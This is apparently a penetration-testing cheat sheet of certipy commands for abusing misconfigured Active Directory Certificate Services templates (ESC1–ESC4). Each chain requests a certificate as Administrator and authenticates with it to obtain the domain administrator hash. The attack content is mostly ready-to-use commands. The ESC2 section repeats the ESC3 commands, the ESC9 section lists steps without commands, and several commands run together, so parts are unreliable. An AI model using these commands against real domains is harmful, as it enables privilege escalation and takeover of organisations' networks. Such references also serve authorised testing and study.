Active Directory Certificate Services (AD CS)
If we have ports 3268, 3269 open, certificates should be checked!
Find Vulnerable Certificates
certipy find -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -vulnerable -stdoutESC1: Misconfigured Certificate Templates
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE> -upn administrator@<DOMAIN> -dns <RHOST>certipy auth -pfx administrator.pfx -dc-ip <RHOST>ESC2: Misconfigured Certificate Templates
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfxcertipy auth -pfx administrator.pfx -dc-ip <RHOST>ESC3: Enrollment Agent Templates
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfxcertipy auth -pfx administrator.pfx -dc-ip <RHOST>ESC4: Vulnerable Certificate Template Access Control
First, overwrite the configuration to make it vulnerable to ESC1
certipy-ad template -dc-ip <ip> -u <user> -p <pass> -template <templateName> -target <ip> -save-oldThen, request a certificate based on the ESC4 template, just like ESC1.
certipy-ad req -username <user> -password <pass> -ca <ca_name> -template <templateName> -upn Administrator@<domain> -target-ip <ip> -dns <dns_dc>Get the hash
certipy-ad auth -pfx administrator_dc01.pfx -dc-ip <ip>ESC9
User 1 have GenericWrite to user2, we can get the user2 hash using shadow Crentials because of user's1 GenericWrite
We can also change the password of that user:
In this step, we change the user2 userPrincipalName to Administrator:
We request the Vulnerable ECS9 Template with the user2
And finally we get the hash of administrator:
Last updated